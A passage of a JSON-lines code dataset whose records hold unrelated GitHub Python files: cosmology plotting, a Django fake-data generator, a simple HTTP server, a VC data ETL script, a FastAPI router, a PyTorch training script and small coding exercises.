power_spec_grouped1 = power_spec.groupby(pd.cut(power_spec['k'], bins=lin_bin)).mean()\n # ax2.plot(power_spec_grouped1['k'],power_spec_grouped1['Pk'], color=color, linestyle='dashed', label=f\"{scheme:s} scheme without interlacing\")[0]\n \n # if interlaced:\n \n power_spec_all = None\n\n for rundir in rundirs:\n snapdir = os.path.join(args.simdir, args.simname, rundir, 'snaps')\n snap = Snapshot(snapfilen(snapdir, i), snapfrmt='gadget4')\n savesdir = os.path.join(args.simdir, args.simname, rundir)\n print(savesdir)\n dens_griddir = os.path.join(savesdir,'meshgrid')\n Pkdir = os.path.join(savesdir,'power_spectrum')\n\n os.makedirs(Pkdir, exist_ok=True)\n\n pk_filepath = os.path.join(Pkdir, f'{scheme:s}_{grid_size:d}{inlcd_str}_{i:03d}.csv' )\n \n h5file = tables.open_file( 
os.path.join(dens_griddir, f'{scheme:s}_{grid_size:d}_{i:03d}.hdf5'), 'r' )\n\n if interlaced:\n power_spec_this = compute_power_spec(h5file.root.PartType1.density,snap.box_size, interlace_with_FX=h5file.root.PartType1.density_shifted, Win_correct_scheme=scheme, grid_size=grid_size)\n\n else:\n power_spec_this = compute_power_spec(h5file.root.PartType1.density,snap.box_size, interlace_with_FX=None, Win_correct_scheme=scheme, grid_size=grid_size)\n\n power_spec_this_grp = power_spec_this.groupby(pd.cut(power_spec_this['k'], bins=merge_bin)).mean()\n power_spec_this_grp.to_csv(pk_filepath, sep='\\t', index=False, float_format='%.8e', header=['k (h/Mpc)', 'P(k) (Mpc/h)^3'])\n\n h5file.close()\n\n power_spec_this_grp = pd.read_csv(pk_filepath, sep='\\t', dtype='float64', names=['k', 'Pk'], header=0)\n # power_spec_folding_this = pd.read_csv(os.path.join(snapdir,f\"powerspecs/powerspec_{i:03d}.txt\"), sep='\\s+', usecols=[0,1], names=['k', 'Delk'], skiprows=5)\n\n if power_spec_all is None:\n power_spec_all = power_spec_this_grp.copy()\n # power_spec_folding_all = power_spec_folding_this.copy()\n else:\n power_spec_all.append( power_spec_this_grp )\n # power_spec_folding_all.append( power_spec_folding_this )\n\n # print(power_spec_folding_this)\n\n power_spec_grp1 = power_spec_all.groupby(pd.cut(power_spec_all['k'], bins=merge_bin)).mean()\n\n # power_spec_folding_all.sort_values('k', inplace=True)\n # power_spec_folding = power_spec_folding_all[power_spec_folding_all['k'].between(1e-3,1e2)]\n # power_spec_folding_grp1 = power_spec_folding.groupby(pd.cut(power_spec_folding['k'], bins=merge_bin)).mean()\n # power_spec_folding_grp1['pk'] = power_spec_folding_grp1['Delk']*power_spec_folding_grp1['k']**-3*2*np.pi**2\n\n ax2.plot(power_spec_grp1['k'],power_spec_grp1['Pk'], color=color, linestyle='dashed', label=f\"z={f'{round(snap.redshift,1):f}'.rstrip('0').rstrip('.'):s}\")[0]\n ax2.scatter(power_spec_grp1['k'],power_spec_grp1['Pk'], color=color, s=4)\n\n # power_spec_folding_grp1.plot('k', 'pk', loglog=True, color=lighter(color), linestyle='dashdot', lw=0.8, ax=ax2, label='', legend=False)\n t_bef, t_now = t_now, time()\n print(t_now - t_bef, f'redshift z={round(snap.redshift,1)} done')\n\nax2.plot([],[], ' ', label=f\"GADGET-4 simulation\")\nax2.plot([],[], linestyle='dashed', color='gray', label=f\" {scheme}-{grid_size:d} grid\")\nax2.plot([],[], linestyle='dashdot', color=lighter('gray'), label=f\" folding technique\")\n# ax2.plot([],[], linestyle='dashed', color=lighter(lighter('gray')), label=f\" for reference\")\nax2.plot([],[], ' ', label=f\"Halofit model\")\nax2.plot([],[], linestyle='solid', color=darker('gray'), label=' Takahashi, 2012')\n# ax2.plot([],[], linestyle='solid', color=lighter('gray'), label=' HMcode-2020')\n# ax2.plot([],[], ' ', label=f\"linear theory\")\nax2.plot([],[], linestyle=(0, (1, 1)), color='gray', label='linear theory')\n# in snapshot-{i:03d}\n# pdb.set_trace()\n\n\n# ax2[1].plot(power_spec['lam'],power_spec['Pk'])\nax2.set_xlabel(r\"$k$ ($h$ Mpc$^{-1}$)\")\nax2.set_ylabel(r\"$P(k)$ ($h^{-1}$Mpc)$^3$\")\nax2.set_xscale('log')\nax2.set_yscale('log')\nax2.set_xlim(k_start*0.8,1.2*k_nyq)\nax2.set_ylim(top=1e5, bottom=2e-1)\nax2.grid(True)\nax2.set_title(f\"Matter power spectrum at different redshifts\")\nax2.legend()\n\nplt.tight_layout()\n# plt.show()\n# pdb.set_trace()\nfig1.savefig(os.path.join(plotsdir, f'{rundir_str:s}_{scheme}{theme:s}.pdf'))\n# fig1.savefig(os.path.join(plotsdir, f'{rundir_str:s}_{scheme}{theme:s}.png'))\n# fig1.savefig(os.path.join(plotsdir, 
f'single_snapshot_pk_{i:03d}{theme:s}.svg'))","repo_name":"premvijay/cosmo-sims","sub_path":"sanity_checks/matter_power_spec/test_with_models.py","file_name":"test_with_models.py","file_ext":"py","file_size_in_byte":11640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38083740166","text":"from typing import List, Any\nimport random\nimport string\nimport os\nfrom faker import Faker\n\nfrom django.core.management import BaseCommand\nfrom django.contrib.auth import get_user_model\n\nfrom news.models import (\n Subscriber,\n Reporter,\n Agency,\n Category,\n News,\n)\nfrom news.services.news import create_unique_token\n\n\ndef get_random_obj(objects: List[Any]) -> Any:\n random_index = random.randint(0, len(objects) - 1)\n return objects[random_index]\n\n\ndef generate_fake_data():\n SUBSCRIBER_COUNT = int(os.getenv(\"SUBSCRIBER_COUNT\", 100))\n AGENCY_COUNT = int(os.getenv(\"AGENCY_COUNT\", 10))\n REPORTER_PER_AGENCY = int(os.getenv(\"REPORTER_PER_AGENCY\", 2))\n NEWS_COUNT = int(os.getenv(\"NEWS_COUNT\", 1000))\n\n fake = Faker()\n # Create subscribers\n subscribers = []\n for i in range(SUBSCRIBER_COUNT):\n username = fake.user_name()\n email = f\"{username}@example.com\"\n password = ''.join(random.choices(string.ascii_letters + string.digits, k=8))\n user = get_user_model().objects.create_user(username=username, email=email, password=password)\n subscriber = Subscriber.objects.create(user=user)\n subscribers.append(subscriber)\n\n reporters = []\n for i in range(AGENCY_COUNT):\n agency = Agency.objects.create(name=fake.company(), description=fake.paragraph())\n for j in range(REPORTER_PER_AGENCY):\n subscriber = subscribers[i * REPORTER_PER_AGENCY + j]\n reporter = Reporter.objects.create(\n subscriber=subscriber,\n avatar=None,\n agency=agency,\n about_me=fake.paragraph(),\n )\n reporters.append(reporter)\n\n categories = [Category.objects.create(title='Sports', description=fake.text()),\n Category.objects.create(title='Weather', description=fake.text()),\n Category.objects.create(title='Travel', description=fake.text()),\n Category.objects.create(title='International', description=fake.text()),\n Category.objects.create(title='Politics', description=fake.text()),\n Category.objects.create(title='Economics', description=fake.text())]\n\n for i in range(NEWS_COUNT):\n reporter = get_random_obj(reporters)\n news = News.objects.create(\n title=fake.sentence(),\n agency=reporter.agency,\n author=reporter,\n token=create_unique_token(),\n image=None,\n description=fake.text(),\n is_draft=fake.boolean(),\n )\n news_categories = []\n if fake.boolean():\n news_categories.append(get_random_obj(categories))\n if fake.boolean():\n news_categories.append(get_random_obj(categories))\n news.categories.set(news_categories)\n\n\nclass Command(BaseCommand):\n help = 'Generate some fake data for testing'\n\n def handle(self, *args, **options):\n generate_fake_data()\n","repo_name":"kysre/johar","sub_path":"news/management/commands/generate_fake_data.py","file_name":"generate_fake_data.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71800789853","text":"import threading\nimport webbrowser\nimport BaseHTTPServer\nimport SimpleHTTPServer\nimport pandas as pd\n\nimport getdata\n\nFILE = 'frontend.html'\nPORT = 8002\n\n\nclass TestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n \"\"\"The test example handler.\"\"\"\n\n def 
do_POST(self):\n        \"\"\"Handle a post request\"\"\"\n        length = int(self.headers.getheader('content-length')) \n        data_string = self.rfile.read(length)\n        try:\n            result = getdata.last_six(data_string)\n            result = result.to_html()\n            result = \"\"+data_string+\"
\"+result\n result = unicode(result)\n except:\n result = 'error'\n self.wfile.write(result)\n \n def do_GET(self):\n \"\"\"Handle a get request\"\"\"\n length = int(self.headers.getheader('content-length')) \n data_string = self.rfile.read(length)\n try:\n result = pd.read_csv(\"prediction.csv\")\n result = getdata.select_columns(result, columns=['Date','HomeTeam','AwayTeam','Prediction'])\n result = result.to_html()\n except:\n result = 'error'\n self.wfile.write(result)\n\n\ndef open_browser():\n \"\"\"Start a browser after waiting for half a second.\"\"\"\n def _open_browser():\n webbrowser.open('http://localhost:%s/%s' % (PORT, FILE))\n thread = threading.Timer(0.5, _open_browser)\n thread.start()\n\ndef start_server():\n \"\"\"Start the server.\"\"\"\n server_address = (\"\", PORT)\n server = BaseHTTPServer.HTTPServer(server_address, TestHandler)\n server.serve_forever()\n\nif __name__ == \"__main__\":\n open_browser()\n start_server()","repo_name":"DarylWinslow/Soccer_Data_Project","sub_path":"Code/HTML/SimpleHTTPServer/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23910028124","text":"# https://leetcode.com/problems/linked-list-cycle/\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution:\n def hasCycle(self, head: Optional[ListNode]) -> bool:\n s = set()\n p = head\n\n while p:\n if p in s:\n return True\n s.add(p)\n p = p.next\n\n return False\n","repo_name":"h-spear/problem-solving-python","sub_path":"leetcode/linked-list/linked-list-cycle.py","file_name":"linked-list-cycle.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"71238861535","text":"import pandas as pd\nimport pytz as lc\n\nstamp=pd.Timestamp('2012-09-09 12:12')\nstamp_utc=stamp.tz_localize('utc')\n\nstamp_utc.tz_convert('America/New_York')\nprint(stamp_utc)\n\nnow=pd.Timestamp.now()\nprint(now)\nprint(lc.common_timezones)","repo_name":"bobsunjack/python-test","sub_path":"test/time_test.py","file_name":"time_test.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"26231239882","text":"# 2.1: Remove Dups\n\nfrom linked_list import LinkedList\n\n# Runtime: O(n) - Space: O(n)\ndef remove_dups(ll: LinkedList):\n seen = set()\n prev = None\n curr = ll.head\n\n while curr:\n if curr.data in seen:\n prev.next = curr.next\n\n seen.add(curr.data)\n prev = curr\n curr = curr.next\n\n\nll = LinkedList()\nll.add(2)\nll.add(5)\nll.add(3)\nll.add(5)\n\nremove_dups(ll)\nll.print()\n","repo_name":"DatGreekChick/ctci","sub_path":"linked-lists/python/remove_dups.py","file_name":"remove_dups.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73924958175","text":"from classes import Product\ndef insertProduct(dict1):\n name = input(\"Enter the new name: \")\n while name in dict1.keys():\n print(\"The product is already registered\") \n name = input(\"Enter the new name: \")\n if len(dict1) == 10:\n print(\"Cannot add product, dictionary is full\")\n else:\n price = float(input(\"Enter the new price: \"))\n stock = int(input(\"Enter the new stock: \")) \n product = Product(name, price, stock)\n dict1[name] = 
[product.price, product.stock]\n \n\ndef searchProduct(dict1):\n name = input(\"Enter the name of the product: \")\n if name not in dict1.keys():\n print(\"Product not found\")\n else:\n values = dict1.get(name)\n product = Product(name,values[0], values[1])\n print(\"The price is\", product.price)\n print(\"The stock is\", product.stock)\n\ndef modifyProduct(dict1):\n name = input(\"Enter the name of the product: \")\n if name not in dict1.keys():\n print(\"Product not found\")\n else:\n price = float(input(\"Enter the new price: \"))\n stock = int(input(\"Enter the new stock: \")) \n dict1[name] = [price, stock]\n \n\n\n# Program init\nproducts = dict() \nchoice = None\nmenu = '''\n MENU:\n 1. Add a new product\n 2. Search for a product\n 3. Modify price and stock\n 4. Exit\n '''\nwhile choice != 4:\n print(menu)\n choice = int(input(\"Select your option: \"))\n while choice not in range(1,5):\n print(\"INVALID CHOICE\")\n choice = int(input(\"Select your option: \"))\n if choice == 1: \n insertProduct(products)\n elif choice == 2:\n searchProduct(products)\n elif choice == 3:\n modifyProduct(products)\nprint(\"See you soon!\")\n \n\n\n","repo_name":"madebypixel02/Python-Weekly-Exercises-2019","sub_path":"Week 11/Exercise 6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"723664502","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom .Tokenizer import Tokenizer, MAX_LEN\nfrom .DataReader import DataReader\nimport os\n\nclass StockDataset(Dataset):\n def __init__(self, datadir, re_path, tokenizer):\n Dataset.__init__(self)\n self.reader = DataReader(datadir)\n self.tk = tokenizer\n self.files = self.reader.listfiles(re_path)\n self.file_size = len(self.files)\n \n def __getitem__(self, index):\n file = self.reader.readyaml(self.files[index])\n stdfenshi = file[\"stdchange\"]\n stdfenshi, seqlen = self.tk.tokenize(stdfenshi)\n stdfenshi = torch.Tensor(stdfenshi).long()\n return stdfenshi, seqlen\n \n def __len__(self):\n return self.file_size\n \n def checkds(self):\n for ix in range(self.file_size):\n file = self.reader.readyaml(self.files[ix])\n stdfenshi = file[\"stdchange\"]\n stdfenshi, seqlen = self.tk.tokenize(stdfenshi)\n if seqlen < 31:\n file_path = str(self.files[ix]).replace('\\\\', '/')\n os.remove(file_path)\n print(file_path)\n \n \nclass StockDatasetCHL(Dataset):\n def __init__(self, datadir, re_path):\n Dataset.__init__(self)\n self.reader = DataReader(datadir)\n self.tk = Tokenizer(grid=100, maxlen=MAX_LEN)\n self.files = self.reader.listfiles(re_path)\n self.file_size = len(self.files)\n \n def __getitem__(self, index):\n file = self.reader.readyaml(self.files[index])\n stdfenshi = file[\"stdchange\"]\n stdhigh = file[\"stdhigh\"]\n stdlow = file[\"stdlow\"]\n stdfenshi, seqlen = self.tk.tokenize(stdfenshi)\n stdhigh, seqlen_h = self.tk.tokenize(stdhigh)\n stdlow, seqlen_l = self.tk.tokenize(stdlow)\n assert seqlen == seqlen_h == seqlen_l\n stdfenshi = torch.Tensor(stdfenshi).long()\n stdhigh = torch.Tensor(stdhigh).long()\n stdlow = torch.Tensor(stdlow).long()\n return stdfenshi, stdhigh, stdlow, seqlen\n \n def __len__(self):\n return 
self.file_size","repo_name":"Aldenhovel/i-love-coding","sub_path":"py/GPSM/utils/StockDataset.py","file_name":"StockDataset.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"33"} +{"seq_id":"588128848","text":"def run():\n \"\"\"\n Escribir un programa que almacene las asignaturas de un curso\n (por ejemplo Matemáticas, Física, Química, Historia y Lengua)\n en una lista y la muestre por pantalla el mensaje Yo estudio ,\n donde es cada una de las asignaturas de la lista.\n \"\"\"\n\n subjects = [\"Mathematics\", \"Physics\", \"Chemistry\", \"History\", \"Language\"]\n for subject in subjects:\n print(f\"Yo estudio {subject}\")\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"javieramayapat/play_with_python_excercises","sub_path":"list_tuples/challenge_2.py","file_name":"challenge_2.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73740501215","text":"from __future__ import division\n\nimport sys\nimport json\nimport os\nimport time\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torch.optim\n\nimport models\nfrom datasets import get_dataset\nfrom utils import Logger\nfrom utils import AverageMeter\nfrom utils import save_checkpoint\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ncudnn.benchmark = True\n\n\ndef update_learning_rate(optimizer, epoch, args, cur_batch, num_batches):\n lr_init = args.get('lr_init', 0.1)\n num_epochs = args['num_epochs']\n\n T_total = num_epochs * num_batches\n T_cur = (epoch % num_epochs) * num_batches + cur_batch\n lr = 0.5 * lr_init * (1 + math.cos(math.pi * T_cur / T_total))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return lr\n\n\ndef error_k(output, target, ks=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n max_k = max(ks)\n batch_size = target.size(0)\n\n _, pred = output.topk(max_k, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n results = []\n for k in ks:\n correct_k = correct[:k].view(-1).float().sum(0)\n results.append(100.0 - correct_k.mul_(100.0 / batch_size))\n return results\n\n\ndef train(epoch, model, criterion, optimizer, dataloader, logger, args):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n error_top1 = AverageMeter()\n error_top5 = AverageMeter()\n\n # Switch to train mode\n model.train()\n num_batches = len(dataloader)\n check = time.time()\n for n, (images, labels) in enumerate(dataloader):\n images, labels = images.to(device), labels.to(device)\n data_time.update(time.time() - check)\n\n lr = update_learning_rate(optimizer, epoch, args, n, num_batches)\n\n check = time.time()\n outputs = model(images)\n loss = criterion(outputs, labels)\n\n # Compute gradient and do SGD step\n model.zero_grad()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Measure elapsed time\n batch_time.update(time.time() - check)\n\n # Measure accuracy and record loss\n top1, top5 = error_k(outputs.data, labels, ks=(1, 5))\n batch_size = images.size(0)\n losses.update(loss.item(), batch_size)\n error_top1.update(top1.item(), batch_size)\n error_top5.update(top5.item(), batch_size)\n\n if n % 10 == 0:\n logger.log('[Epoch %3d; %3d] [Time %.3f] [Data %.3f] [Loss %f] [LR %.3f]' %\n (epoch, n, batch_time.value, data_time.value, 
losses.value, lr))\n check = time.time()\n\n logger.log('[DONE] [Time %.3f] [Data %.3f] [Loss %f] [Train@1 %.3f] [Train@5 %.3f]' %\n (batch_time.average, data_time.average, losses.average,\n error_top1.average, error_top5.average))\n logger.scalar_summary('loss', losses.average, epoch)\n logger.scalar_summary('train_1', error_top1.average, epoch)\n logger.scalar_summary('batch_time', batch_time.average, epoch)\n\n\ndef test(epoch, model, criterion, dataloader, logger=None):\n batch_time = AverageMeter()\n losses = AverageMeter()\n error_top1 = AverageMeter()\n error_top5 = AverageMeter()\n\n # Switch to eval mode\n model.eval()\n with torch.no_grad():\n for n, (images, labels) in enumerate(dataloader):\n images, labels = images.to(device), labels.to(device)\n\n check = time.time()\n outputs = model(images)\n loss = criterion(outputs, labels)\n\n # Measure elapsed time\n batch_time.update(time.time() - check)\n\n # Measure accuracy and record loss\n top1, top5 = error_k(outputs.data, labels, ks=(1, 5))\n\n batch_size = images.size(0)\n losses.update(loss.item(), batch_size)\n error_top1.update(top1.item(), batch_size)\n error_top5.update(top5.item(), batch_size)\n\n if n % 10 == 0:\n if logger:\n logger.log('[Test %3d] [Time %.3f] [Loss %f] [Test@1 %.3f] [Test@5 %.3f]' %\n (n, batch_time.value, losses.value, error_top1.value, error_top5.value))\n else:\n print('[Test %3d] [Time %.3f] [Loss %f] [Test@1 %.3f] [Test@5 %.3f]' %\n (n, batch_time.value, losses.value, error_top1.value, error_top5.value))\n\n if logger:\n logger.log(' * [Error@1 %.3f] [Error@5 %.3f] [Loss %.3f]' %\n (error_top1.average, error_top5.average, losses.average))\n logger.scalar_summary('error_1', error_top1.average, epoch)\n logger.scalar_summary('error_5', error_top5.average, epoch)\n logger.scalar_summary('loss_test', losses.average, epoch)\n\n return error_top1.average\n\n\ndef main(args, fn):\n logger = Logger(fn)\n\n hparams = args['model_hparams']\n if args['dataset'] in ['cifar10', 'fmnist']:\n hparams['n_classes'] = 10\n elif args['dataset'] == 'cifar100':\n hparams['n_classes'] = 100\n elif args['dataset'] == 'tinyimg':\n hparams['n_classes'] = 200\n elif args['dataset'] == 'imagenet':\n hparams['n_classes'] = 1000\n logger.log(args)\n hparams['dataset'] = args['dataset']\n\n model = models.__dict__[args['model']](hparams)\n logger.log(model)\n\n if torch.cuda.is_available():\n n_gpus = torch.cuda.device_count()\n if n_gpus > 1:\n logger.log('Multi-GPU mode: using %d GPUs for training.' 
% n_gpus)\n model = nn.DataParallel(model).cuda()\n else:\n logger.log('Single-GPU mode.')\n model = model.cuda()\n else:\n n_gpus = 0\n\n # Configure parameters to optimize\n pg_normal = []\n pg_small = []\n\n for p in model.parameters():\n if not p.requires_grad:\n continue\n elif hasattr(p, 'wd_small') and p.wd_small:\n pg_small.append(p)\n else:\n pg_normal.append(p)\n\n params = [\n {'params': pg_normal, 'weight_decay': 1e-4},\n {'params': pg_small, 'weight_decay': 1e-5}\n ]\n\n # Define loss function (criterion) and optimizer\n criterion = nn.CrossEntropyLoss().to(device)\n optimizer = torch.optim.SGD(params,\n lr=args.get('lr_init', 0.1),\n momentum=args.get('momentum', 0.9),\n nesterov=True)\n\n train_set, test_set = get_dataset(args['dataset'])\n n_workers = max(8*n_gpus, 4)\n train_loader = torch.utils.data.DataLoader(train_set,\n shuffle=True,\n pin_memory=True,\n batch_size=args['batch_size'],\n num_workers=n_workers)\n test_loader = torch.utils.data.DataLoader(test_set,\n shuffle=False,\n pin_memory=True,\n batch_size=args['batch_size'],\n num_workers=n_workers)\n\n best = 100.0\n for epoch in range(args['num_epochs']):\n train(epoch, model, criterion, optimizer, train_loader, logger, args)\n error = test(epoch, model, criterion, test_loader, logger)\n\n # Perform dealloc/realloc for SelectiveConv2d modules\n for m in model.modules():\n if type(m).__name__ in ['SelectiveConv2d']:\n if epoch < 0.5 * args['num_epochs']:\n m.dealloc()\n m.realloc()\n\n if isinstance(model, nn.DataParallel):\n save_states = model.module.state_dict()\n else:\n save_states = model.state_dict()\n\n is_best = (best > error)\n if is_best:\n best = error\n save_checkpoint(epoch, args, best,\n save_states, optimizer.state_dict(),\n logger.logdir, is_best)\n logger.scalar_summary('best', best, epoch)\n logger.log('[Epoch %3d] [Test %5.2f] [Best %5.2f]' % (epoch, error, best))\n\n\nif __name__ == '__main__':\n config_path = sys.argv[1]\n with open(config_path) as file:\n config = file.read()\n print(config)\n args = json.loads(config)\n config_fn = os.path.split(config_path)[-1].split('.')[0]\n\n main(args, config_fn)\n\n","repo_name":"jh-jeong/selective-convolution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"33"} +{"seq_id":"70728451614","text":"import pandas as pd\n\ndef read_file(path):\n df_all = pd.read_excel(path, header=0) #Y://Data//python//Liq//Table2_new.xlsx\n return df_all #header=0, i.e. first row parsed as column name\n\n \n#reason: pd read year data as float, thus need to change\ndef transformDF(df_all):\n oldtime1 = df_all['投资时间'].tolist()\n newtime1 = []\n for i in range(len(oldtime1)):\n if '.' 
not in str(oldtime1[i]):\n newtime1.append('')\n else:\n newtime1.append(str(int(oldtime1[i])))\n\n # replace this col\n df_all_new = df_all.replace(to_replace=df_all['投资时间'].tolist(), value=newtime1)\n return df_all_new\n\n#common function, unique elements with a same order \ndef unilst(lst):\n uni=[]\n for i in range(len(lst)):\n if lst[i] in uni:\n continue\n else:\n uni.append(lst[i])\n return uni\n\ndef mainprocess(df_all_new):\n org = df_all_new['机构代码'].tolist()\n uni_org = unilst(org)\n t2_orgnum = [] #(org,year) as primary key\n t2_year = []\n t2_exp = [] #investment experience (number of companies invested/year)\n t2_idscul = []#cumulative number of industries this org has entered\n t2_vca = [] #type VC-series A\n t2_vcb = []\n t2_vcc = []\n t2_vcd = []\n t2_vce = []\n t2_vcm = [] # missing value count\n t2_newids = [] #number of new industries entered/year\n t2_newdist = [] #number of new districts entered/year\n for i in range(len(uni_org)): #loop of orgs\n df_suborg = df_all_new[df_all_new['机构代码'] == uni_org[i]]\n\n lst_tempyear = [int(ele) for ele in df_suborg['投资时间'] if ele != '']\n if len(lst_tempyear) == 0:\n continue\n\n max_year = max(lst_tempyear)\n min_year = min(lst_tempyear)\n\n industry_cum = 0\n industry_lst = []\n new_district_lst = []\n for j in range(max_year - min_year + 1): #loop of years /org\n df_subyear = df_suborg[df_suborg['投资时间'] == str(min_year + j)]\n VC_A = 0\n VC_B = 0\n VC_C = 0\n VC_D = 0\n VC_E = 0\n VC_miss = 0\n new_industry = 0\n new_district = 0\n #print(min_year + j)\n #print('length', len(df_subyear))\n #print(df_subyear)\n\n if len(df_subyear) == 0: #no data here\n year = str(min_year + j)\n exp = 0\n industry_cum = industry_cum\n VC_A = 0\n VC_B = 0\n VC_C = 0\n VC_D = 0\n VC_E = 0\n VC_miss = 0\n new_industry = 0\n new_district = 0\n else:\n year = str(min_year + j)\n exp = len(df_subyear['投资企业'])\n\n for k in range(len(df_subyear['行业'])):\n #print(df_subyear['行业'].tolist()[k])\n if df_subyear['行业'].tolist()[k] == '':\n continue\n if df_subyear['行业'].tolist()[k] not in industry_lst:\n industry_lst.append(df_subyear['行业'].tolist()[k])\n new_industry += 1\n industry_cum += 1\n else:\n continue\n\n for k in range(len(df_subyear['投资性质'])):\n if df_subyear['投资性质'].tolist()[k] == '':\n VC_miss += 1\n continue\n if df_subyear['投资性质'].tolist()[k] == 'VC-Series A':\n VC_A += 1\n elif df_subyear['投资性质'].tolist()[k] == 'VC-Series B':\n VC_B += 1\n elif df_subyear['投资性质'].tolist()[k] == 'VC-Series C':\n VC_C += 1\n elif df_subyear['投资性质'].tolist()[k] == 'VC-Series D':\n VC_D += 1\n elif df_subyear['投资性质'].tolist()[k] == 'VC-Series E':\n VC_E += 1\n else:\n VC_miss += 1\n\n for k in range(len(df_subyear['地区'])):\n if df_subyear['地区'].tolist()[k] == '':\n continue\n if df_subyear['地区'].tolist()[k] not in new_district_lst:\n new_district += 1\n new_district_lst.append(df_subyear['地区'].tolist()[k])\n else:\n continue\n # print(industry_cum)\n t2_orgnum.append(uni_org[i])\n t2_year.append(year)\n t2_exp.append(exp)\n t2_idscul.append(industry_cum)\n t2_vca.append(VC_A)\n t2_vcb.append(VC_B)\n t2_vcc.append(VC_C)\n t2_vcd.append(VC_D)\n t2_vce.append(VC_E)\n t2_vcm.append(VC_miss)\n t2_newids.append(new_industry)\n t2_newdist.append(new_district)\n\n print(\"org:%10s,year:%5s,exp:%d,induscul:%d,A:%d,B:%d,C:%d,D:%d,E:%d,Miss:%d,newindus:%d,newdist:%d\" %\n (uni_org[i], year, exp, industry_cum, VC_A, VC_B, VC_C, VC_D, VC_E, VC_miss, new_industry, new_district))\n\n\n\n#multiple lists into a single dataframe\ndef 
lst_to_df(t2_orgnum,t2_year,t2_exp,t2_idscul,t2_vca,t2_vcb,t2_vcc,t2_vcd,t2_vce,t2_vcm,t2_newids,t2_newdist):\n t2df = pd.DataFrame(\n {'ORG_NUM': t2_orgnum,\n 'YEAR': t2_year,\n 'EXPERIENCE/year': t2_exp,\n 'CUMUL-INDUSTRY': t2_idscul,\n 'VC_typeA': t2_vca,\n 'VC_typeB': t2_vcb,\n 'VC_typeC': t2_vcc,\n 'VC_typeD': t2_vcd,\n 'VC_typeE': t2_vce,\n 'VC_miss': t2_vcm,\n 'NEW_INDUSTRY/year': t2_newids,\n 'NEW_DISTRICT/year': t2_newdist\n })\n #rearrange the order of columns \n t2df_f = t2df[\n ['ORG_NUM', 'YEAR', 'EXPERIENCE/year', 'CUMUL-INDUSTRY', 'VC_typeA', 'VC_typeB', 'VC_typeC', 'VC_typeD',\n 'VC_typeE',\n 'VC_miss', 'NEW_INDUSTRY/year', 'NEW_DISTRICT/year']]\n return t2df_f\n\n#write a df to a xlsx file\ndef df_to_xlsx(df,path):\n writer = pd.ExcelWriter(path)\n df.to_excel(writer, 'Sheet1')\n writer.save()\n\ndef check_list_value():\n disset=set(df_all['投资性质'].tolist())\n print(disset)\n\n\ndef main():\n df_all=read_file('Y://Data//python//Liq//Table2_new.xlsx')\n df_all_new=transformDF(df_all)\n mainprocess(df_all_new)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ladzzzz123/VC_Data_ETL","sub_path":"ADV_transform/Table2process.py","file_name":"Table2process.py","file_ext":"py","file_size_in_byte":6576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"11124006030","text":"from fastapi import APIRouter, HTTPException\nfrom app.config.database import conn\nfrom app.models.model import models\nfrom app.schemas.model import Model\n\nmodel = APIRouter(\n tags=['models']\n)\n\nclass ModelNameAlreadyExist(Exception):\n pass\n\n@model.get('/models')\nasync def get_models():\n try:\n return { \"models\": conn.execute(models.select()).fetchall() }\n except Exception:\n raise HTTPException(500, \"Failed to load models.\")\n\n@model.post('/models', status_code=201)\nasync def create_model(model: Model):\n try:\n existing_model = conn.execute(models.select().where(models.columns.name == model.name)).first()\n\n if existing_model is not None:\n raise ModelNameAlreadyExist(\"Failed to create model! There is already a model using that name.\")\n\n conn.execute(models.insert().values(\n name = model.name\n ))\n\n # Returns the last AUTO_INCREMENT generated id per-connection.\n result = conn.execute('SELECT LAST_INSERT_ID() AS id').fetchone()\n return { \"id\": result['id'] }\n except ModelNameAlreadyExist as error:\n raise HTTPException(409, str(error))\n except Exception:\n raise HTTPException(500, \"Failed to create model.\")\n","repo_name":"Papajohn77/VRP_Solver","sub_path":"backend/app/routers/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"17504823398","text":"# Solved by @kitanoyoru\n# 